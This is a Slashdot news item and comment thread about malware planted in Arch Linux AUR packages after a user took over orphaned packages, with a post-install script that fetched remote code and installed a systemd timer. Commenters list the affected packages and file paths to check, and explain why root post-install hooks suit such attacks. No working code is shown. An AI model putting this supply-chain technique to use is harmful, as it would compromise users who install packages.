Slashdot is powered by your submissions, so send in your scoop

 



Forgot your password?
typodupeerror
×
Security

Malware Found in Arch Linux AUR Package Repository (bleepingcomputer.com) 69

An anonymous reader shares a report: Malware has been discovered in at least three Arch Linux packages available on AUR (Arch User Repository), the official Arch Linux repository of user-submitted packages. The malicious code has been removed thanks to the quick intervention of the AUR team. The incident happened because AUR allows anyone to take over "orphaned" repositories that have been abandoned by their original authors. On Saturday, a user going by the pseudonym of "xeactor" took over one such orphaned package named "acroread" that allows Arch Linux users to view PDF files. According to a Git commit to the packag's source code, xeactor added malicious code that would download a file named "~x" from ptpb [dot] pw, a lightweight site mimicking Pastebin that allows users to share small pieces of texts.
This discussion has been archived. No new comments can be posted.

Malware Found in Arch Linux AUR Package Repository

Comments Filter:
  • by AlanObject ( 3603453 ) on Tuesday July 10, 2018 @06:48PM (#56925748)

    From the looks of it the bad actor xeactor didn't have any expectation beyond finding out if his little trick would work or not.

    On the other side this could be a case study about the immune system that open source provides.

  • by Anonymous Coward

    I'm more interested in why there is so little malware. I would have expected lots of malware without any packages needing to be hijacked.

    • by jmccue ( 834797 )

      I kind of wonder this also. I do not know how many package maintainers in ARCH or how it works, but with the amount of packages available in some distros these days I guess I should not be surprised.

      Sad that distro maintainers may have to vet maintainers now, adding an additional burden. But as a user we should always be careful with non-core packages.

      • I made this comment in the story that is about to roll off the bottom of the page...

        At home, I have used Linux - first Redhat, then Fedora - since about 1999. I have never used any sort of virus/malware scanning software. As far as I know, I have never had any malware. I don't know how common this is.

    • by Anonymous Coward

      I'm more interested in why there is so little malware.

      How many packages (maintainers) are actually already compromised, waiting for the trigger to be pulled to push out the big fail? How would you know?

    • by raymorris ( 2726007 ) on Tuesday July 10, 2018 @08:07PM (#56925996) Journal

      He was caught within a few hours, because all changes all public:

      https://aur.archlinux.org/cgit... [archlinux.org]

      Possibly bad guys would rather add trojans to iPhone and Android apps, which may stay in the store for months without detection. You can't tell what changes have been made to compiled apps you download on iPhone, Android, or Windows.

    • by Anonymous Coward

      It needs another malware program to run. Something called systemd.

    • First: We don't know if there is any more until we find it. Therefore: The System is as Secure as an Open Door.

      Second: Malware authors target platform that matter, i.e. Windows (large user base), RedHat (users are companies), Linux Kernel itself (large user base, governments, companies, etc...)

      And Lastly: There is nothing worthwhile to steal from unemployed neckbeards (although I like Arch, and I work over 14 hrs a day the days I don't attend university).

    • by AHuxley ( 892839 )
      Its a lot of work for number of users per distro. To look at free work on a distro on the users computer?
      With other consumer OS the ability to "consume" would be of interest to malware.
    • Effort vs. effect. And that ratio simply sucks when you consider the market share of Linux, and then that this market share is also again split up between the various distributions.

      Hence invading a distribution repository isn't that helpful if your goal is what most untargeted malware attacks are aiming for: Wide distribution. It's different if you have a specific target in mind, like a particular government facility, but then you would probably be rather targeting one of the larger distributions, not Arch.

    • People aren't going to waste their time when they know any malicious code will be discovered quickly and there is a high chance their name will be spread far and wide on the blackball circuit.
  • First, post-install script runs as root. Second, it runs during installation. If putting it in the program (e.g. acroread), the user has to run it to trigger. Most Linus package systems support post-install script. e.g. https://docs-old.fedoraproject... [fedoraproject.org]
    • by Anonymous Coward

      I recommend either installing AUR packages by hand, during which you can check the Post-Install, or using a AUR Helper that allows viewing of said script. True, it takes time to verify yourself. But, a precursory glance helps screen some of the stupid stuff like pulling a script from a pastebin clone.

      And yes, it takes time. That's always a tradeoff, convenience vs security.

  • Affected Packages (Score:5, Informative)

    by Philotomy ( 1635267 ) on Tuesday July 10, 2018 @10:20PM (#56926452)

    According to posts on aur-general [archlinux.org], the known affected packages are:

    • acroread 9.5.5-8
    • balz 1.20-3
    • minergate 8.1-2

    According to comments on the AUR acroread package [archlinux.org], the script the compromised package installed (to upload system details) contained an error and wouldn't function properly. The script also installed a systemd timer, and the comments advise checking your system for:

    • /usr/lib/xeactor
    • /usr/lib/systemd/system/xeactor.timer
    • /usr/lib/systemd/system/xeactor.service

    As a side-comment, for those unfamiliar with Arch, these compromised packages are not part of the official Arch repositories. The AUR is a "user repository": a collection of user-supplied packages which require deliberate download and installation. AUR packages should [i]always[/i] be reviewed before installing them, and not installed if you don't trust the package. As the AUR documentation [archlinux.org] explains, "Warning: Carefully check all files. Carefully check the PKGBUILD and any .install file for malicious commands. PKGBUILDs are bash scripts containing functions to be executed by makepkg: these functions can contain any valid commands or Bash syntax, so it is totally possible for a PKGBUILD to contain dangerous commands through malice or ignorance on the part of the author. Since makepkg uses fakeroot (and should never be run as root), there is some level of protection but you should never count on it. If in doubt, do not build the package and seek advice on the forums or mailing list."

    • by Anonymous Coward

      The official security bulletin also advises end users to look for a highly suspect and malicious malware code called 'systemd'. If found, removal is strongly recommended and encouraged for both the sanity and security of the end user and system.

    • by AmiMoJo ( 196126 )

      Ah, the classic wetware exploit: user too lazy to carefully examine every file before installing.

  • If you read the mailing lista thread you understand where the real problem is.

    "Users should check what they install". What's been tour latest package check?
    Have you checksummed tour ISO download?

    And why shouldn't I check the downloafs from the ma in website? Because of trust?
    There fan always ne a crack I can use to slip into, if I have enough motivation.

    I think the whole system is screwed up. I think "we can't rewind we've gone to far".

  • by damaki ( 997243 ) on Wednesday July 11, 2018 @01:52AM (#56926992)
    It is written basically everywhere in the AUR official documentation: do not trust AUR packages, verify everything before install! AUR packages are like Ubuntu PPAs, there is no security policy and no patch policy. But that is totally fine! It is entirely the point of AUR; anybody can contribute to it. For AUR packages security, you are on your own and you should check the sources thoroughly when you install an AUR package!
    • by sad_ ( 7868 )

      the people who actually care are a minority, most people will just install whatever.
      it's like that on windows (people just download and install anything they find on whatever shady site) or smartphones (most android problems result from installing apk's downloaded from... shady sites).
      things like AUR, PPA's, containers (docker, snap, ...) etc bring this problem to linux. it's a security disaster waiting to happen.

    • AUR packages are like Ubuntu PPAs, there is no security policy and no patch policy. But that is totally fine! It is entirely the point of AUR; anybody can contribute to it.

      No, AUR packages are not like Ubuntu PPAs, because every deb is signed, and every PPA belongs to a specific user. You cannot get malware from another user account which has taken over a PPA simply by updating, because Ubuntu does not allow different user accounts to take over a PPA. Naturally, someone who manages to take over someone else's identity to the point that they can sign packages as that user can upload malware to their PPA, but that's true of all such schemes.

      Letting users take over other users'

Genius is ten percent inspiration and fifty percent capital gains.

Working...